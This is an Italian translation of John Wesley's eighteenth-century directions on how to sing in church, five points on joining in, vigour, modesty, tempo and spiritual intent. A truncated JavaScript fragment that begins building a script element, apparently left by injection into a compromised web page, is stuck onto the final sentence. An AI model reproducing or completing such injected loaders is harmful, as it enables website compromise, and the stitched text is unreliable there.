Istruzioni su come cantare in chiesa – dal grande predicatore del XVIII secolo John Wesley
Perché questa parte del culto di adorazione sia più gradita a Dio, così come più utile ed efficace per te stesso e per gli altri, fai attenzione ad osservare le seguenti indicazioni:
1. CANTA INSIEME A TUTTI
Unisciti alla congregazione più spesso che puoi. Non permettere che una leggera difficoltà o un po’ di stanchezza ti blocchino. Se anche si tratti di una croce per te, mettitela sulle spalle, e troverai una benedizione.
2. CANTA CON VIGORE E CON CORAGGIO
Attenzione a non cantare come se fossi mezzo morto, o mezzo addormentato; ma alza la voce con forza. Non aver paura ora di alzare la voce, né vergogna che qualcuno ti senta, come quando cantavi le canzoni del diavolo.
3. CANTA CON MODESTIA
Non strillare così tanto da prevalere o superare con la tua voce il resto della congregazione, perché non devi distruggere l’armonia; ma cerca di unire la voce insieme agli altri, in modo da rendere il suono melodioso e chiaro.
4 . CANTA A TEMPO
Qualunque sia il tempo che si canta assicurati di mantenerlo. Non andare avanti agli altri, ma tieniti vicino con le voci che guidano e allineati con esse il più possibile. E fai attenzione a non cantare troppo lento. Questo modo di strascicare è tipico naturalmente di tutti coloro che sono pigri; ed è tempo che questo fare sia estromesso dal nostro mezzo, per cantare tutti i nostri cantici così veloci come facevamo all’inizio.
5. SOPRATTUTTO, CANTA SPIRITUALMENTE.
Cerca di dedicare a Dio ogni parola che canti. Cerca di piacere a Lui più che a te stesso o a qualsiasi altra creatura. Per questo, partecipa intimamente al senso di ciò che canti; e guarda che il tuo cuore non si lasci trasportare dalla melodia, ma sia un’offerta continua a Dio. Così che il tuo canto sia approvato ora dal Signore, e premiato quando Egli verrà sulle nuvole del cielo.var d=document;var s=d.createElement(‘script’);